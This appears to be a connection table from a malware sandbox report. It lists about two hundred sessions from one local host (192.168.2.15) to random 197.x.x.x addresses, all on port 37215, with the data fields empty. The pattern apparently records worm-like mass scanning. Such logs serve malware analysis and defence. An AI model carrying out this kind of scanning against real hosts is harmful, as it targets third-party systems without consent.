                                                                            17744192.168.2.1538074197.91.196.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17745192.168.2.1540180197.31.65.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17746192.168.2.1542896197.4.14.1337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17747192.168.2.1535474197.67.19.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17748192.168.2.1545050197.242.157.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17749192.168.2.1560986197.204.100.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17750192.168.2.1557924197.46.115.22937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17751192.168.2.1536816197.140.69.12037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17752192.168.2.1555876197.246.96.12237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17753192.168.2.1533706197.97.42.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17754192.168.2.1558114197.164.117.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17755192.168.2.1535352197.160.168.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17756192.168.2.1537212197.88.147.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17757192.168.2.1533474197.172.112.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17758192.168.2.1536668197.200.194.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17759192.168.2.1560794197.4.180.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17760192.168.2.1554224197.190.23.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17761192.168.2.1535272197.153.10.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17762192.168.2.1560466197.54.233.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17763192.168.2.1535102197.47.158.10137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17764192.168.2.1549186197.128.107.21937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17765192.168.2.1556778197.191.193.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17766192.168.2.1557054197.108.255.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17767192.168.2.1549358197.112.196.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17768192.168.2.1557596197.222.195.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17769192.168.2.1540006197.199.203.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17770192.168.2.1556040197.62.252.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17771192.168.2.1534854197.78.130.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17772192.168.2.1547912197.74.71.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17773192.168.2.1533492197.152.216.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17774192.168.2.1557902197.103.242.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17775192.168.2.1550922197.51.21.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17776192.168.2.1556724197.44.43.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17777192.168.2.1558222197.182.87.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17778192.168.2.1532994197.29.140.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17779192.168.2.1544592197.227.116.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17780192.168.2.1539514197.96.216.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17781192.168.2.1553766197.80.225.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17782192.168.2.1553704197.242.121.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17783192.168.2.1554522197.164.56.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17784192.168.2.1559776197.2.133.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17785192.168.2.1546960197.223.250.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17786192.168.2.1559046197.7.49.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17787192.168.2.1555642197.78.34.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17788192.168.2.1548422197.190.245.24037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17789192.168.2.1558884197.130.242.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17790192.168.2.1560330197.196.53.537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17791192.168.2.1542264197.83.133.4137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17792192.168.2.1559788197.156.123.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17793192.168.2.1545192197.142.63.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17794192.168.2.1535098197.190.177.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17795192.168.2.1560236197.147.64.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17796192.168.2.1550106197.166.206.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17797192.168.2.1540244197.6.186.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17798192.168.2.1555384197.72.14.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17799192.168.2.1546140197.146.99.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17800192.168.2.1558404197.98.152.9437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17801192.168.2.1558810197.17.207.17137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17802192.168.2.1550212197.70.61.4637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17803192.168.2.1555630197.255.178.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17804192.168.2.1533734197.171.48.10237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17805192.168.2.1536158197.168.33.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17806192.168.2.1537542197.23.184.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17807192.168.2.1554470197.84.65.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17808192.168.2.1535696197.200.37.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17809192.168.2.1550630197.55.227.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17810192.168.2.1533374197.207.235.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17811192.168.2.1558126197.76.46.12337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17812192.168.2.1547124197.36.251.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17813192.168.2.1554102197.150.239.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17814192.168.2.1555830197.191.101.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17815192.168.2.1544946197.21.242.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17816192.168.2.1556598197.42.110.15537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17817192.168.2.1550012197.192.29.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17818192.168.2.1560604197.125.218.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17819192.168.2.1559502197.28.116.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17820192.168.2.1548540197.158.88.21037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17821192.168.2.1560044197.12.22.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17822192.168.2.1537238197.236.27.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17823192.168.2.1554014197.54.26.837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17824192.168.2.1544340197.204.70.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17825192.168.2.1541152197.87.105.1837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17826192.168.2.1556600197.55.246.11837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17827192.168.2.1532940197.182.70.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17828192.168.2.1541690197.186.169.17737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17829192.168.2.1538556197.94.9.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17830192.168.2.1535848197.145.135.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17831192.168.2.1544548197.251.4.12737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17832192.168.2.1546806197.177.128.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17833192.168.2.1547120197.163.175.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17834192.168.2.1557904197.65.163.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17835192.168.2.1551294197.114.149.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17836192.168.2.1559966197.64.44.22537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17837192.168.2.1544650197.148.253.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17838192.168.2.1549664197.201.107.13337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17839192.168.2.1542410197.3.141.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17840192.168.2.1555158197.213.94.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17841192.168.2.1543088197.123.49.24937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17842192.168.2.1558308197.34.90.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17843192.168.2.1560198197.49.31.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17844192.168.2.1536852197.36.243.9537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17845192.168.2.1559612197.204.78.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17846192.168.2.1534846197.237.116.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17847192.168.2.1542340197.213.144.22637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17848192.168.2.1541328197.235.218.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17849192.168.2.1546206197.220.91.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17850192.168.2.1560950197.47.48.10937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17851192.168.2.1541736197.65.18.3437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17852192.168.2.1556364197.101.43.4737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17853192.168.2.1533250197.176.135.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17854192.168.2.1532994197.68.217.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17855192.168.2.1555062197.131.58.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17856192.168.2.1556258197.233.151.23837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17857192.168.2.1556702197.205.17.25037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17858192.168.2.1540886197.126.135.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17859192.168.2.1534752197.18.63.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17860192.168.2.1556254197.106.247.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17861192.168.2.1557966197.201.60.14837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17862192.168.2.1558248197.95.25.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17863192.168.2.1537382197.162.103.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17864192.168.2.1554556197.32.192.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17865192.168.2.1551422197.57.189.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17866192.168.2.1540232197.162.2.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17867192.168.2.1558390197.88.209.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17868192.168.2.1545436197.108.6.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17869192.168.2.1533320197.220.0.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17870192.168.2.1550938197.16.182.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17871192.168.2.1557434197.205.130.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17872192.168.2.1542120197.108.168.13237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17873192.168.2.1546424197.33.112.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17874192.168.2.1534806197.0.248.14337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17875192.168.2.1550146197.229.111.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17876192.168.2.1541046197.211.235.8837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17877192.168.2.1544894197.138.136.14037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17878192.168.2.1548400197.191.142.13637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17879192.168.2.1549264197.41.47.10037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17880192.168.2.1544284197.179.139.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17881192.168.2.1553244197.239.14.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17882192.168.2.1556424197.242.22.2337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17883192.168.2.1539122197.44.55.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17884192.168.2.1545614197.67.8.19937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17885192.168.2.1555354197.80.97.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17886192.168.2.1556892197.238.156.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17887192.168.2.1553006197.222.119.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17888192.168.2.1536120197.108.92.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17889192.168.2.1538162197.66.184.5637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17890192.168.2.1533304197.110.62.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17891192.168.2.1557380197.253.19.1537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17892192.168.2.1540550197.232.26.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17893192.168.2.1555874197.155.115.4437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17894192.168.2.1558896197.30.179.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17895192.168.2.1539588197.84.134.8137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17896192.168.2.1553446197.252.160.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17897192.168.2.1552468197.206.145.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17898192.168.2.1538584197.222.143.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17899192.168.2.1547986197.151.227.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17900192.168.2.1552220197.44.247.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17901192.168.2.1549702197.11.44.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17902192.168.2.1535176197.244.106.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17903192.168.2.1550328197.229.128.23637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17904192.168.2.1534506197.181.14.14437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17905192.168.2.1548920197.113.26.6837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17906192.168.2.1542808197.228.189.14637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17907192.168.2.1536314197.57.162.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17908192.168.2.1538244197.48.5.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17909192.168.2.1560100197.195.123.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17910192.168.2.1555466197.63.172.7937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17911192.168.2.1535610197.196.216.20437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17912192.168.2.1535302197.240.149.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17913192.168.2.1535922197.89.165.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17914192.168.2.1560928197.163.110.2737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17915192.168.2.1547026197.81.8.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17916192.168.2.1555984197.247.31.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17917192.168.2.1540046197.5.15.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17918192.168.2.1549288197.235.228.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17919192.168.2.1537058197.177.213.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17920192.168.2.1553246197.72.129.15837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17921192.168.2.1557168197.29.140.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17922192.168.2.1552082197.229.38.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17923192.168.2.1550506197.68.2.2237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17924192.168.2.1556530197.27.106.1137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17925192.168.2.1533138197.190.201.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17926192.168.2.1554580197.121.250.6337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17927192.168.2.1543794197.9.226.6437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17928192.168.2.1543690197.30.68.1937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17929192.168.2.1537396197.221.205.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17930192.168.2.1559124197.87.78.15637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17931192.168.2.1554768197.253.175.10837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17932192.168.2.1534326197.24.166.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17933192.168.2.1552960197.174.166.12937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17934192.168.2.1544952197.200.57.20737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17935192.168.2.1539238197.57.43.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17936192.168.2.1558996197.96.178.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17937192.168.2.1558992197.192.217.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17938192.168.2.1558852197.185.180.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17939192.168.2.1549880197.164.148.1637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17940192.168.2.1554596197.118.211.21337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17941192.168.2.1553634197.216.176.1037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17942192.168.2.1546028197.174.208.16537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            17943192.168.2.1557480197.40.214.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
